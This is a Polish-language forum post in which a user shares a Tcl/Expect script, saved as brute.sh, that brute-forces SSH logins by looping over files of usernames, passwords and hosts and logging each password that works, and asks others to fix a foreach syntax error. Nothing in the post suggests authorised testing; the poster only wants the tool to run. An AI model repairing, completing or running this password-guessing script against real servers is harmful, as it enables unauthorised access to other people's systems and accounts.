Nie jesteś zalogowany.
Jeśli nie posiadasz konta, zarejestruj je już teraz! Pozwoli Ci ono w pełni korzystać z naszego serwisu. Spamerom dziękujemy!
Prosimy o pomoc dla małej Julki — przekaż 1% podatku na Fundacji Dzieciom zdazyć z Pomocą.
Więcej informacji na dug.net.pl/pomagamy/.
Witam,
mam taki oto skrypcik:
#!/usr/bin/env tclsh set timeout 5 set dictionary [lindex $argv 0] set file [lindex $argv 1] set user [lindex $argv 2] if {[llength $argv] != 3} { puts stderr "Usage: $argv0 <dictionary-file> <hosts-file> <user-file>\n" exit } set tryHost [open $file r] set tryPass [open $dictionary r] set tryUser [open $user r] set passwords [read $tryPass] set hosts [read $tryHost] set login [read $tryUser] foreach username $login { foreach passwd $passwords { foreach ip $hosts { spawn ssh $username@$ip expect "-" send "$passwd\n" set logFile [open $ip.log a] expect "L" { puts $logFile "password for $username@$ip is $passwd\n" close $logFile } set id [exp_pid] exec kill -INT $id } } }
Niestety przy próbie odpalenia dostaję taki komunikat:
wrong # args: should be "foreach varList list ?varList list ...? command" while executing "foreach username $login" (file "./brute.sh" line 28)
Niestet nie znam tcl'a, czy mógłby ktoś poprawić ten błędzik?
pozdrawiam,
night
Offline